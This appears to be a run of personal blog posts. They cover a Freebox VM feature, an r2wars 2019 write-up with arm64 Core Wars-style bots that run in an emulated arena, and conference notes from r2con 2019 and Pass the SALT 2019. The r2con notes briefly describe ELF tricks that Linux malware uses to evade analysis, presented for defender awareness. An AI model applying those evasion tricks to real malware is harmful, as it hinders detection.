Those of you who read my LinkedIn profile know that I work on the consumer-facing boxes of the French ISP called Free, at the Iliad subsidiary called Freebox. Free is often credited as the inventor of ADSL triple-play, and has been making its own hardware with Freebox for almost 20 years now. The latest gateway/set-top-box triple play offer is called Freebox Delta and is relatively high-end; non-French readers can find a good overview of the Freebox Delta at Engadget. The gateway, Freebox Server, ships with RAID, 10Gbps support, wifi with 160MHz bands, lots of NAS features, etc. And now it's the first ISP gateway to also provide compute, via installable VMs, available to subscribers.

You can use it to host your personal cloud, home automation, multimedia server, etc. It's truly generic compute, with an arm64 OS, so your imagination is the limit. I'm already using it at home to run a few services that were on a Raspberry Pi: it's much faster thanks to the 64-bit OS, and more reliable than microSD cards.

It's built on top of QEMU and supports cloud-init, USB passthrough, remote display, and lots of other small goodies. In the process of building it, I found two QEMU bugs (one of which danpb fixed upstream in QEMU 4.1.0), two Ubuntu bugs and released a debug tool for websocket ttys.

You'll find some of the coverage of this release in french here, with quotes from yours truly, as well as the article that was published on the Freebox developers blog (french).

Install of a VM

r2wars 2019

2019-09-08T00:00:00+02:00

You might have noticed I was at r2con 2019. This is my writeup for the r2wars 2019 challenge.

r2wars primer: a Core Wars-like game

In radare2, there's an intermediate language and VM called ESIL. It is used to emulate code, and supports many architectures. r2wars is built on top of r2's ESIL VM, so it supports any ESIL instruction sets, for example x86-32, mips-32 or arm-64.

Since it's based on Core Wars, in r2wars two opponents create "bots", short assembly programs, which are executed one after the other, in the same memory space, thanks to ESIL emulation. The goal is to be the last to survive, usually by wiping your opponent so that it executes an invalid instruction.

The ESIL VM is initialized with a 1024-byte memory space plus a stack (more on that later), and the two opponents are placed randomly in this space. They are executed in round-robin: one after the other, one instruction each. A particularity is that you can have an opponent using a different architecture, since multi-architecture combats are supported: you only share the memory space, not the CPU state (registers). The server makes sure your memory does not overlap your opponent's at launch; afterwards, all bets are off. The CPU state is dumped after each instruction, to let the opponent run, and then restored before running the next instruction.

A contestant's bot loses when it attempts to:

execute an invalid instruction
write or read outside of the arena or stack
execute instructions outside of the arena
trigger an interrupt, trap, io error or exception.

The most reliable way to win is therefore to trigger one of the previous conditions for the opponent by overwriting where it executes. But another strategy could also be to survive until the other one suicides.
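The round-robin execution and the losing conditions can be modelled with a toy simulator. The Python sketch below is not ESIL and not the r2wars code: plain Python callables stand in for instructions, each bot has its own private register dictionary, and the `sweeper` and `sitter` bots are made-up examples.

```python
ARENA_SIZE = 1024


class Bot:
    """A toy bot: private registers plus a function executing one instruction."""

    def __init__(self, name, regs, step):
        self.name = name
        self.regs = regs    # private CPU state, never shared with the opponent
        self.step = step    # callable(regs, arena) running a single instruction
        self.alive = True


def sweeper(regs, arena):
    """Store 16 bytes of 0xFF at a decreasing address on every turn."""
    regs["ptr"] -= 16
    if regs["ptr"] < 0:
        raise IndexError("write outside of the arena")
    arena[regs["ptr"]:regs["ptr"] + 16] = b"\xff" * 16


def sitter(regs, arena):
    """Loop in place; fails once the byte under its pc has been overwritten."""
    if arena[regs["pc"]] == 0xFF:
        raise ValueError("invalid instruction")


def run_match(bots, arena, max_cycles=4000):
    """Run one instruction per bot in turn; return the survivor's name or None."""
    for _ in range(max_cycles):
        for bot in bots:
            try:
                bot.step(bot.regs, arena)
            except (IndexError, ValueError):
                bot.alive = False  # the bot hit one of the losing conditions
            alive = [b for b in bots if b.alive]
            if len(alive) == 1:
                return alive[0].name
    return None


if __name__ == "__main__":
    arena = bytearray(ARENA_SIZE)
    bots = [Bot("sweeper", {"ptr": 1008}, sweeper), Bot("sitter", {"pc": 512}, sitter)]
    print(run_match(bots, arena))
```

Even in this toy model, the two ways of winning show up: the sweeper wins if its writes reach the sitter's code first, and loses if it runs off the arena before hitting anything.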

You send the source of your bot to the organizers ; the r2wars software is built in mono with a web interface, and automates the following tasks: it uses rasm2, the radare2 assembler to build your bot, it launches radare2, initializes ESIL, then launches 1v1 matches in a tournament, to determine the global ranking.

The challenge is run over the two days of r2con, with tournament runs at 10am, 2pm, and 5-6pm. So one has 5 runs to perfect their bot (with small prizes after each), and one final run for the final ranking.

Initial approach

I'm not a beginner to this challenge, since I participated last year; so my first idea was simply to take my last bot, which ranked second last year, and submit it. Here is the commented arm64 assembly source:

adr x0, start          ; get address of start label with pc-relative adr instruction
mov x3, 1008           ; put relocation address in x3 (just before the end of arena)
neg x5, x0             ; put some value looking like ffffff in x5 for writing
mov x4, x5             ; copy x5 to x4
ldp x1, x2, [x0]       ; load code at start label into x1 and x2 (2 4-bytes instructions in each)
stp x1, x2, [x3]       ; store code to relocation address
br x3                  ; jump to the core loop at the relocation address
start:
stp x5, x4, [x3, -16]! ; decrement x3 by 16, then store 16 bytes of data (x5 and x4) in address pointed by x3
stp x5, x4, [x3, -16]! ; same write 16 bytes + pre-decrement
stp x5, x4, [x3, -16]! ; same write 16 bytes + pre-decrement
b start                ; loop with relative backward jump

The core of this bot is 4 instructions, with a small setup to relocate the bot at the end of memory. Once the whole memory is overwritten, this bot makes a write to an invalid address (x3 underflows) and dies.
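The lifetime of this bot can be worked out with a short Python model of the write pointer. It only tracks x3 across the repeated pre-decrement stores, assuming the 1024-byte arena and the 1008 relocation address from the listing above; a negative value stands in for the register underflow.

```python
ARENA_SIZE = 1024


def stores_before_fault(start: int = 1008, step: int = 16) -> list[int]:
    """Addresses written by repeated pre-decrement stores until x3 goes negative."""
    written = []
    x3 = start
    while True:
        x3 -= step          # the pre-decrement happens before the store
        if x3 < 0:
            return written  # this store would land outside the arena
        written.append(x3)


if __name__ == "__main__":
    addrs = stores_before_fault()
    print(len(addrs), addrs[0], addrs[-1])  # 63 992 0
```

So the bot gets 63 stores of 16 bytes, covering addresses 0 to 1007 and leaving its own relocated loop at 1008 untouched, before the 64th store faults.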

I reused my workspace from last year meaning I could immediately do debug runs in radare2, but I had to reinstall the official mono builds (the only ones that work with r2wars) to run the game simulations.

I lightly tested my bot in radare2 (it worked, like last year), and submitted it immediately once my plane landed so that I could do the first round. I didn't want to spend too much time on it this year and wanted to follow more talks.

First roadblock

I got a message from the organizer asking me if I tested my bot. Hmmm, my spidey sense told me this wasn't a good sign. Of course, I tested it in radare2, it did overwrite the whole memory.

But as the first round came, something weird happened. It seemed like my bot committed suicide after only a few cycles. Did I miss something or trigger an exception ? I tried it again, and found I was able to reproduce the problem in r2wars, so I went to see the organizer to ask for help. It seemed the problem was only reproduced when running the bot in r2wars; the only difference with my testing script, is that r2wars needs to save and restore the CPU state after each instruction to execute each contestant in round-robin.

Very soon, skuater had a minimal reproducer of the issue, which helped pancake issue a fix. It was an underflow on restoration of the zero-register (x31), which instead of being ignored, triggered write side effects in x0, corrupting it.

It took some time for the fix to propagate to the machine used to run the tournament, so I missed the next two rounds of the day as well: not such a big issue since it gave me more time to follow the talks and socialize.

Reminiscence

I took some time to try out an idea I had last year and for which I had submitted an ESIL patch: the single instruction bot, which consists of only one instruction that writes itself at the next address with a pre-increment:

adr x0, start
ldr x1, [x0]
str x1, [x2]
br x3
start:
str x1, [x2, 4]!
str x1, [x2, 4]!

It still needs to write 8 bytes (two identical instructions), but it's effectively only using one at a time. It takes advantage of the fact that all registers (here x2 and x3) are initialized to zero.

While the bot did work, it wasn't very effective in my simulations, since the smaller footprint (4 bytes at a given time) wasn't worth the much lower write throughput, which seems to be a core metric (but not the sole one, as we'll see later) in bot performance.

Insomnia

I didn't mean to, but it was bound to happen. I couldn't sleep, despite waking up very early to catch my morning flight.

It occurred to me that I could simply work around the radare2 issue by changing the register allocation in last year's bot: the bot was, after all, only using six out of thirty-one available registers on aarch64.

So I changed the bot to use different registers. It did work with a buggy radare2. But it wasn't enough.

I couldn't just keep testing against my simple bots, so I decided to do simulations against some of the best contestants from last year. Some had been published on github, so I downloaded them for simulation.

And they were still better. So I changed strategies... Along the way, I tried changing the loop to have one restore between each instruction, as well as delaying the relocation as much as possible, in order to beat other bots that would relocate at the end, like ik4ru5. In retrospect, the former (continuous restoration) was a mistake: it divided write throughput by 3, which is a hard blow to the bot performance.

Here, you can see how I duplicated the relocation code store instruction in order to delay the main loop as much as possible:

adr x10, start
mov x13, 1008
mov x14, x13
sub x5, x5, 1
mov x4, x5
ldp x11, x12, [x10]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
stp x11, x12, [x13]
br x13
start:
stp x11, x12, [x13]
stp x5, x4, [x14, -16]!
stp x11, x12, [x13]
b start

It did provide better performance against ik4ru5 and t_pageflt, but neither of them were participating in this year's r2 wars… So the result the next day on the first round wasn't really good:

I ranked 6th out of 12.

Intelligence

Luckily, I had decided to fully record this round (or as much as possible) in order to gather intel on how exactly the other bots worked. I just couldn't continue going in blind since there were only two tournament runs left, which wouldn't provide a good feedback loop for bot improvement.

I recorded videos and took a few photos in order to have a view on every participant, then decided to rewrite the top-5 bots from scratch. I first thought of using the assembly source, but since the r2 disassembler converts relative addresses (jumps, etc.) to absolute addresses, it would be hard, so I "simply" copied the hex code of each instruction into .hex directives for the assembler. It wasn't that simple though, as the quality was sometimes less than optimal:

The challenge for next year would be to automate this task with OCR or Google Lens.

After a few typos, I finally had the code of the other top-5 contestants for this tournament iteration. I just had to hope that they wouldn't modify their bots too much before the next run.

Unsurprisingly, they were very good, and were beating (mostly) all the bots I had ever written. It might have stemmed from the pushal strategy that all the x86-32 bots employed: this instruction enables a throughput of 32 bytes per ESIL cycle, twice the 16 bytes per cycle of arm64 stp.

So I ran more simulations and iterated over the bot from last year.

Improvements

After a few iterations (not shown here), here is the bot that had a good win-rate in simulations (5 out of 5 adversaries). You can see it has many small changes:

adr x10, start             ; 1
mov x2, 512+32             ; 2 - heuristic
mov x8, 0x180              ; 3 - heuristic
mov x9, 0x180              ; 4 - heuristic
ldp x11, x12, [x10], 16    ; 5
ldp x14, x15, [x10]        ; 6
stp x11, x12, [x9], 16     ; 7
stp x14, x15, [x9]         ; 8
br x8                      ; 9
start:                     ; 10
and x2, x2, #0x3f0         ; 11 - looping with a modulo
stp x11, x12, [x2], 16     ; 12
stp x14, x15, [x2], 16     ; 13
stp x11, x12, [x2], 16     ; 14
stp x14, x15, [x2], 16     ; 15
stp x11, x12, [x2], 16     ; 16
stp x14, x15, [x2], 16     ; 17
b start                    ; 18

From line 2 you can see that something changed: I've split the main heuristic of relocating to the end of memory and writing from there into two: now the relocation address is at 384 bytes, and the start of writing address is 544.

The main loop (lines 10-18) is now 8 instructions instead of 4, so it needs to be loaded with two ldp (lines 5-6), and stored with two stp (lines 7-8). Both use post-increment instead of pre-increment addressing.

In the loop, you see that we repeat the two stp in lines 12-17: that's because we now write the bot itself all over memory, instead of 0xFF. I found this was just as efficient as 0xFF against x86 bots, and luckily, there was no arm64 participant this year !

Finally, this bot never dies by itself: as you can see, the first instruction of the loop is an and, in order to only keep the lower bits of the write address register x2. We need to make sure that we finish with 0x400 in x2 at the end of the loop; this has the consequence of limiting the choices of the write-start heuristic (it must be of the form n*96+64), and we absolutely need to use a post-increment instead of a pre-increment to detect the overflow before writing out of the arena.
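The n*96+64 constraint can be checked with a few lines of Python. This is only a sketch of the arithmetic, not something run during the tournament: it assumes a 1024-byte (0x400) arena and the 96 bytes written per loop iteration (six stp of 16 bytes each), and the function and constant names are made up for illustration.

```python
ARENA_SIZE = 0x400        # assumed arena size: 1024 bytes
BYTES_PER_LOOP = 6 * 16   # six stp of 16 bytes each per loop iteration
MASK = 0x3F0              # mask applied by the `and` at the top of the loop


def lands_on_arena_end(start):
    """Return True if x2 reaches exactly ARENA_SIZE at the end of an iteration."""
    x2 = start & MASK
    while x2 < ARENA_SIZE:
        x2 += BYTES_PER_LOOP
    return x2 == ARENA_SIZE


# Every 16-byte aligned start address from which the first pass ends on 0x400.
valid_starts = [s for s in range(0, ARENA_SIZE, 16) if lands_on_arena_end(s)]

print(valid_starts)
print(lands_on_arena_end(512 + 32))  # the heuristic used by the bot above
```

All the addresses it prints are of the form n*96+64, and 544 (512+32) is one of them. Once x2 is exactly 0x400, the mask turns it into 0 since 0x400 & 0x3f0 is 0.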

Since this bot was unbeatable in my simulations (except by some arm64 bots with different heuristics) against "real" bots, I was very confident, and submitted my new iteration to the organizer, full of hubris:

But unfortunately, it wasn't the winner of the next round either, although it came close:

This was mostly because the CAP had improved his bot again, and we were now very close in terms of performance. I missed the beginning of this tournament round, so I don't know which combat round was lost or why.

Interlude: funny bots spotted

During the first tournament round of the second day, we noticed something weird: an x86 bot was quite big, and took a lot of cycles doing almost nothing:

Turns out the bot was writing a message on screen, which took lots of cycles to write, because it was encoded in a bitmap that needed to be decoded. This bot had little chance of survival, in addition to triggering the timeout (4000 cycles), before finishing the full message, which I was told needed ~6000 cycles to complete. But a colleague of the author of PROSTmahlzeit was kind enough to submit the surviv0r bot so that it would get a chance to write its message. It was noticed by the organizers, and he got the prize he asked for :-)

Then, on the next tournament run, someone copied the idea, but implemented it in mips:

No bitmap though here since every address is hardcoded, making for a huge bot :-)

ARMv7 explorations

Over lunch, I was reminded of an ARMv7 instruction a colleague told me about: stmia and its ldmia counterpart. These are used to store/load a set of registers with a post-increment of the address register. They're usually used for stack push/pop, fast memcpys, or context switching.

More importantly, it means you can reach a write throughput of 64 bytes per cycle (32 bits * 16 registers). So I modified my workspace to add support for arm32 bots and wrote a simple bot. Unfortunately, the post-increment in stmia did not work in ESIL.
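To compare the store instructions mentioned so far, here is the arithmetic as a small Python sketch. It assumes one instruction per ESIL cycle and takes the register counts at face value (16 registers for stmia is the upper bound quoted above); the table and function names are just for illustration.

```python
# instruction -> (registers stored, bytes per register)
STORES = {
    "x86-32 pushal": (8, 4),   # the 8 general-purpose 32-bit registers
    "arm64 stp": (2, 8),       # a pair of 64-bit registers
    "ARMv7 stmia": (16, 4),    # up to 16 32-bit registers
}


def bytes_per_instruction(name):
    """Bytes written by a single execution of the given store instruction."""
    registers, size = STORES[name]
    return registers * size


for name in STORES:
    print(f"{name}: {bytes_per_instruction(name)} bytes per cycle")
```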

Since I had decided to leave my bot as-is for the last round, I took instead some time to fix the stmia behaviour in ESIL, and submitted a pull request even with tests this time !

It's quite simple, and if you want to contribute to radare2, you can look at these patches, and do the same thing for the stmib, stmdb or ldmia variants. You can look at one of the ESIL introductory talks to understand how it works.

Final results and notes

Tips

Here's what I learned from the r2wars competition: Measure the average throughput per cycle (in my case, it was 12 bytes, just like last year). Measure the cycles to first write (7 cycles), and the length of your bot's main loop (32 bytes). Test against real bots; you can look at my repo for an overview, but for best results, try the ones you competed with in a previous round ! Once you know your competitors, you can tune the bot style (static or mobile), your start position, what type of data you write (are you writing valid x86 opcodes?), where you start writing it, etc.
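As an illustration, the three numbers above can be derived from the listing of the bot in the Improvements section. This is a rough sketch that assumes one instruction per ESIL cycle and ignores labels; the variable names are mine.

```python
# One mnemonic per instruction, in execution order (the start: label is omitted).
SETUP = ["adr", "mov", "mov", "mov", "ldp", "ldp", "stp", "stp", "br"]
LOOP = ["and", "stp", "stp", "stp", "stp", "stp", "stp", "b"]

INSTRUCTION_SIZE = 4   # bytes, fixed-width arm64 encoding
STP_BYTES = 16         # one stp stores two 64-bit registers

# The first stp of the setup code is the first write to memory.
cycles_to_first_write = SETUP.index("stp") + 1
# Size of the main loop, i.e. what has to be copied when relocating.
loop_length_bytes = len(LOOP) * INSTRUCTION_SIZE
# Bytes written per loop iteration, averaged over the cycles it takes.
throughput = LOOP.count("stp") * STP_BYTES / len(LOOP)

print(cycles_to_first_write, loop_length_bytes, throughput)
```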

Results

So the last round came and ran. I hadn't modified the bot since last time, as I wasn't sure what to improve, and I was thinking it best to leave well enough alone. Was it a good decision? Let's find out:

It turns out it was: I arrived first ! Of course it was luck, since neither the cap nor I decided to modify our bots.

Note that the cap arrived in the top 3 of the CTF and also co-won the r2 PwnDebian challenge !

I also learned that I was the only one to have copied and run simulation with the competitors' bots, so the "intelligence" I described above gave me a bit of an advantage :-)

r2wars future

As we saw before, the write throughput is an important metric. And since ESIL isn't cycle accurate compared to the architectures it emulates, anyone adding instructions with higher throughput to the ESIL machine would have a huge advantage.

So the only logical conclusion is to move to SIMD instruction sets. Once NEON and AVX-512 are implemented, it will make for much faster bots. NEON VSTM can write 128 bytes in one instruction for example. We'll see if people plan r2wars by adding instructions to ESIL in advance :-) If it happens, the organizers might need to change the rules: have a bigger arena, ban some instructions, or make them take more cycles (i.e. put a write throughput cycle cap in ESIL).

I want to thank the organizers for the incredible turn-around after I reported an issue. The second day, r2wars runs moved from Windows to Mac, they added color legends in the corners, and it ran and timed out faster !

r2con 2019

2019-09-06T00:00:00+02:00

I'm back in Barcelona for this year's edition of r2con. You can read my r2con 2018 report.

radare2 is a debugging and reverse engineering toolkit. It's mostly used from the command line or through a programming interface (r2pipe) that is identical to the command line one.

Cutter

Cutter is the official graphical user interface for radare2. It's cross-platform (written in C++ with Qt), and built on top of radare2.

It has a dynamic graph view, a linear disassembly view, a hexdump view for data, and various other widgets.

During the last year, plugin support was added as well as a graph overview, a theme editor, and many new translations and bug fixes.

A new entrant in the reversing landscape this year was Ghidra, a new tool with a particularly powerful decompiler. The decompiler part is now integrated directly into radare, with the r2ghidra-dec plugin. This plugin also works with Cutter.

It allows exploring the decompiled C code side-by-side with the disassembly, as well as importing headers to decode struct accesses, etc.

Who you gonna' syscall ?

Grant's goal with this talk is to share how he improved his workflow with Frida and r2 on iOS, to automate the analysis of protected arm64 iOS apps that include anti-debug.

down the business with r2dwarf

Dwarf, in this talk, is a Frida frontend, and a framework to allow debugging a target process with a GUI. r2dwarf is a pipe between Dwarf and r2. It wraps common Frida operations to make dynamic debugging and reversing easier.

Understanding ESIL emulation

ESIL is an emulator inside radare2. It's built on top of an intermediate language based on reverse Polish notation.

The ESIL machine is based on infinite memory and registers. There are then bindings/aliases to map ESIL registers to the architecture-specific ones.

The ESIL machine is based on a set of instructions with a stack machine (using reverse Polish notation). Every native instruction is converted into a "transformation", which is an ESIL string in reverse Polish notation.
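To give an idea of how such a stack machine evaluates a string, here is a toy evaluator in Python. It is not radare2's implementation: it only handles three operators, the register names are arbitrary, and the operand order (destination pushed last) is an assumption modelled on the comma-separated form of ESIL strings.

```python
def run_esil_like(expr, regs):
    """Evaluate a comma-separated RPN string against a register file (toy subset)."""
    stack = []

    def value(tok):
        # A stack entry is an already computed int, a register name or a literal.
        if isinstance(tok, int):
            return tok
        return regs[tok] if tok in regs else int(tok, 0)

    for tok in expr.split(","):
        if tok == "+":
            a = value(stack.pop())
            b = value(stack.pop())
            stack.append(a + b)
        elif tok == "=":
            dst = stack.pop()              # destination register name
            regs[dst] = value(stack.pop())
        elif tok == "+=":
            dst = stack.pop()
            regs[dst] = regs[dst] + value(stack.pop())
        else:
            stack.append(tok)              # operand: push it as-is
    return regs


regs = {"eax": 0, "ebx": 7}
run_esil_like("ebx,eax,=", regs)    # something like: mov eax, ebx
run_esil_like("1,eax,+=", regs)     # something like: add eax, 1
print(regs)
```

Each native instruction becomes one such string, and the architecture-specific part is reduced to producing the right string and mapping register names.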

Overview of the Linux threat landscape

An issue with Linux is the low visibility of the threat landscape. At Intezer, the team discovered many new threats, from crypto-mining to trojans and botnets, some of them coming from nation-state actors.

As the landscape evolves, threat detection will improve, as well as the malware methods. The goal of the talk is to present a few of the techniques for defender awareness, in particular ELF tricks.

ELF parsing can be complex. Sections in binaries get loaded into memory segments depending on their types. A common obfuscation technique is to remove or scramble some sections. The simplest workaround is to ignore or scrub scrambled sections when analyzing.

It's often possible to break a parser with just one byte modification, for example, by modifying the endianness of the file.
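As an illustration of how little it takes, the declared endianness of an ELF file lives in a single byte of its identification header (EI_DATA, at offset 5). The sketch below is not from the talk; it builds a fake 16-byte e_ident in memory and flips that byte, and the helper name is hypothetical.

```python
EI_DATA = 5   # offset of the data-encoding byte inside e_ident
DATA_NAMES = {1: "little-endian", 2: "big-endian"}   # ELFDATA2LSB / ELFDATA2MSB


def declared_endianness(header):
    """Return the endianness an ELF header claims to use."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    return DATA_NAMES.get(header[EI_DATA], "invalid")


# Minimal 16-byte e_ident: magic, ELFCLASS64, ELFDATA2LSB, EV_CURRENT, padding.
ident = bytearray(b"\x7fELF\x02\x01\x01" + bytes(9))
print(declared_endianness(bytes(ident)))   # little-endian

ident[EI_DATA] = 2                         # the one-byte modification
print(declared_endianness(bytes(ident)))   # big-endian
```

A parser that trusts this byte will then decode every multi-byte field of the file with the wrong byte order.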

Another presented technique is to hide dynamic entries. It has been found in a lot of native objects packed in Android malware. The technique uses a mismatch between the section offset and the address that is used to map the segment, in order to have a fake dynamic section, and a real one that will be mapped in memory.

Relocation hijacking uses the relocation features of ELF: these are usually well known and easy to detect, but it's possible to use a few tricks to avoid detection.

Pass the SALT 2019 live report (part 3/3)

2019-07-03T00:00:00+02:00

This year I'm at the Pass the Salt 2019 conferences. You'll find part 1 and part 2 of my notes here.

Configurations, Do you prove yours ?

by Alexandre Brianceau (slides)

Alexandre went a bit more into detail on the core concepts behind DevSecOps, and why continuous configuration and observability are important to understand what's happening in an IT system and match compliance targets.

Rudder, while it started 10 years ago as an ops and reliability tool, now takes an approach to configuration management and observability focused on compliance, and is often used by SecOps teams.

What you most likely did not know about sudo…

by Peter Czanik (slides)

Most people do not know what sudo is (a prefix?) or what it can be used for, Peter says.

A basic rule set describes who can do what, where and as which user. But sudo also allows defining aliases and groups for each of these, making configuration less error prone.

sudo can modify or filter environment variables, or even spew insults when someone types a wrong password, although this isn't enabled by default. It's possible to add rules to verify the integrity of a binary before running it, or even record terminal sessions of sudo commands, although those session logs are easy to delete. Peter did a demo of this feature with the sudoreplay command that replayed a recorded session.

It has a plugin-based architecture, and there are many open source and commercial plugins for sudo. An interesting one is sudo_pair, which allows real-time approval of sudo commands by an admin user, coupled with live session viewing and control by the admin.

The configuration of sudo is interpreted from top to bottom, so one should put the most generic rules first, and exceptions at the end. It's possible to configure sudo through LDAP, allowing to have a remote-only configuration. Peter showed a sample sudoers file, where we can see the importance of the order of rules interpretation.
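The effect of rule ordering can be modelled in a few lines of Python. This is a toy model of "the last matching rule wins", not sudo's parser: the rules, users and commands are made up, and shell-style patterns stand in for the real sudoers syntax.

```python
from fnmatch import fnmatchcase

# (user pattern, command pattern, allowed): hypothetical rules, generic first.
RULES = [
    ("alice", "*", True),                   # generic: alice may run anything
    ("alice", "/usr/bin/passwd*", False),   # exception: but not passwd
]


def is_allowed(user, command, rules=RULES):
    """Walk the rules top to bottom; the last matching rule decides."""
    decision = False   # nothing matched: deny
    for user_pattern, command_pattern, allowed in rules:
        if fnmatchcase(user, user_pattern) and fnmatchcase(command, command_pattern):
            decision = allowed   # later matches override earlier ones
    return decision


print(is_allowed("alice", "/usr/bin/ls"))       # True
print(is_allowed("alice", "/usr/bin/passwd"))   # False
# With the exception placed first, the generic rule silently overrides it.
print(is_allowed("alice", "/usr/bin/passwd", list(reversed(RULES))))   # True
```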

Logging

By default all logs are sent to syslog. Peter advises using central logging with sudo for analysis. It's possible to use syslog-ng for that, with a minimal configuration.

Since he works on syslog-ng, Peter showed an example of building a pipeline for sudo logs and alerting, and sending alerts to slack.

In conclusion, sudo is not just a prefix, but a very powerful and versatile tool.

Be secret like a ninja with Hashicorp Vault

by Mehdi Laruelle

Credentials sharing between persons or programs is often an issue in an enterprise environment. Hashicorp Vault attempts to solve this issue by providing controlled-access and encrypting "secrets".

There are different kinds of secrets in Vault: static, key/value secrets; dynamic secrets (cloud…), and the ones that are encrypted on-demand.

Vault works by giving access to secrets to an application; the simplest way to use it is to store static secrets in Vault, and give access to apps that have the proper role. Then, one should make the secrets dynamic. Finally, sensitive data should also be encrypted, and Vault provides a service to do that.

Mehdi did a demo showing how a simple service can access credentials to a database with Vault. The Vault app role id and secrets are passed through the environment, then the app uses those to connect to Vault's API and get the DB credentials. This app also encrypted sensitive data with the Vault API before storing it in the DB. In this case, the DB username and passwords were generated dynamically by Vault. Then, using the Vault web UI, Mehdi decrypted the data that was encrypted.
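The flow of the demo could look roughly like the following Python sketch, which talks to Vault's HTTP API with the standard library only. It is not Mehdi's code: it assumes the AppRole and database secrets engines are mounted at their default paths (approle and database), and the environment variable names other than VAULT_ADDR, as well as the my-db-role name, are hypothetical.

```python
import json
import os
import urllib.request

VAULT_ADDR = os.environ.get("VAULT_ADDR", "http://127.0.0.1:8200")


def approle_login_request(role_id, secret_id, addr=VAULT_ADDR):
    """Build the AppRole login request (assumes the default 'approle' mount)."""
    body = json.dumps({"role_id": role_id, "secret_id": secret_id}).encode()
    return urllib.request.Request(
        f"{addr}/v1/auth/approle/login",
        data=body,
        method="POST",
        headers={"Content-Type": "application/json"},
    )


def db_creds_request(token, db_role, addr=VAULT_ADDR):
    """Build the request for dynamic DB credentials (default 'database' mount)."""
    return urllib.request.Request(
        f"{addr}/v1/database/creds/{db_role}",
        headers={"X-Vault-Token": token},
    )


def fetch_db_credentials(role_id, secret_id, db_role, addr=VAULT_ADDR):
    """Log in with the app role, then ask Vault for a fresh DB user and password."""
    with urllib.request.urlopen(approle_login_request(role_id, secret_id, addr)) as resp:
        token = json.load(resp)["auth"]["client_token"]
    with urllib.request.urlopen(db_creds_request(token, db_role, addr)) as resp:
        data = json.load(resp)["data"]
    return data["username"], data["password"]


# Hypothetical usage, with the role id and secret id taken from the environment:
# user, password = fetch_db_credentials(
#     os.environ["APP_ROLE_ID"], os.environ["APP_SECRET_ID"], "my-db-role")
```

Since the credentials are generated on demand, the app never stores a long-lived database password; it only needs its own role id and secret id.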

In conclusion, Mehdi says one should always attempt to implement the principle of least privilege, and Vault helps to do that.

Scale Your Auditing Events

by Philipp Krenn

Auditd is a component that works with the Linux kernel auditing system. It can be used to monitor network access, system calls, commands, etc. The raw logs are hard to understand, Philipp says. There are tools to show statistics, or search through the events with auditd, and it is well documented. Namespace support is still a work in progress though.

To centralize all of this, the Elastic stack can be used. There's a Filebeat module for Logstash for that, but it relies on regular expressions to parse the raw logs. That's why the Auditbeat module was built in order to get the structured information directly. It's implemented on top of go-libaudit. Philipp showed a few examples of Auditbeat configurations and what can be done with it.

Elastic SIEM is new software that builds on top of the Elastic Common Schema (ECS) and Auditbeat in order to provide a high-level view with search capability on the events that are put into the Elastic stack.

Programming research: a missed opportunity for secure and libre software?

by Gabriel Scherer

Public research often picks a hard problem and attempts to solve it. But the produced software is most of the time an unmaintained proof of concept. The free software community also has hard problems to solve, and there are a few collaborations between the academic community and the free software community, like Coccinelle with the Linux kernel, but not enough, Gabriel says.

He showed a demo of a programming environment (Why3) made for writing correct programs and proving them.

There are static analyzers that can be very useful to rule out entire classes of failure. Annotations are good, Gabriel says, because they help both humans and tools alike. There are a few success stories in that domain, like Astrée, that proved that there were no errors in Airbus flight control software.

Verified programming is the next step, where the annotations are used to prove the correctness, like it is done in Spark/Ada.

With proof assistants, the users write a full mathematical proof that is verified by the checker. The micro-kernel seL4 was proven this way for example.

Unfortunately, free software lacks adoption of those tools, and this is also the research community's fault, Gabriel says. An easy way to fix that is to use safer languages for new projects, citing modern C++ and Rust as examples, and stop using C or PHP. A bit more work is required to try to adopt static-analysis tools. And finally, keeping up-to-date on programming research is also important, for example by funding programmers to go to academic conferences, or even by collaborating with academia.

D4 Project - Design and Implementation of an Open Source Distributed and Collaborative Security Monitoring

by Alexandre Dulaunoy, Jean-Louis Huynen and Aurelien Thirion

Sharing sensor information easily and automatically between organizations is an issue. One of the initial goals of the D4 project was to have flexibility on the type of sensor and the type of information that could be shared. The goal isn't to reinvent existing tools, but to build on top of them and provide sharing capability in the platform.

The D4 project was started in late 2018, so it's still very young, but it has been fully open from the start.

The monitoring protocol is very simple, and can be extended very easily to plug new data sources. The D4 server provides a web interface to browse the monitored data. The team showed a demo of the project, with various types of sensors (DNS, TLS) to show the powerful capabilities of the tool.

No IT security without Free Software

by Max Mehl

Free software provides four different freedoms: to use, study, share and modify a piece of software. Security in itself is a process, Max cites Bruce Schneier.

Security benefits from free software through transparency: independent audits increase trust, Max says. Releasing code can be scary, but this is for the best: it pushes one to look closely at what is released when the code is available. Sharing synergies with the community and giving independence to users also helps security.

Max went through a few of the arguments against making software free. He then cited the example of the Huawei 5G controversies, and how they could be solved by moving to free software, whether or not it's realistic in the short term.

Managing a growing fleet of WiFi routers combining OpenWRT, WireGuard, Salt and Zabbix

by Kenan Ibrović

Kenan's organization provides secure routers to journalists around the world. They want to manage their fleet of routers around the world, with no on-site technical support.

The routers are based on OpenWRT and use WireGuard to provide VPN access to the devices. SaltStack is used to manage the devices, which allows running commands on all the devices securely and remotely.

Salt node groups are used to organize the inventory. Pillars make the states reusable, by storing per-device credentials, variables, etc. Zabbix is used to monitor the routers.

All the devices use a public VPN based on OpenVPN for the public connection, with a shared account. Since they don't have enough space on the devices, they use external USB flash drives with ExtRoot to store more data and install more apps.

When the device is updated, by default the apps are deleted, so they have a configuration script to do the reinstallation after updates or even after USB-unplug.

Better curl !

by Yoann Lamouroux

The curl project was started in 1996 by Daniel Stenberg. It's composed of libcurl, which has bindings in most languages, and the curl binary that is installed on most OSes.

curl is stable and widely deployed. The most basic use is to fetch a URL and show the response body or headers with -v.

You can also use --trace-ascii to see the detailed transferred bytes. --trace-time will show detailed timing information when used with -v.

When you need to change the IP resolution it's possible to use the --resolve parameter. Yoann says there's no need to remember the parameters, you can put the options in your ~/.curlrc if you always use them. If you use browser dev tools, it has a "Copy as curl" feature which gives you a command line you can reuse.

It's also possible to generate C source code with the --libcurl option.

PatrOwl - Orchestrating SecOps with an open-source SOAR platform

by Nicolas Mattiocco

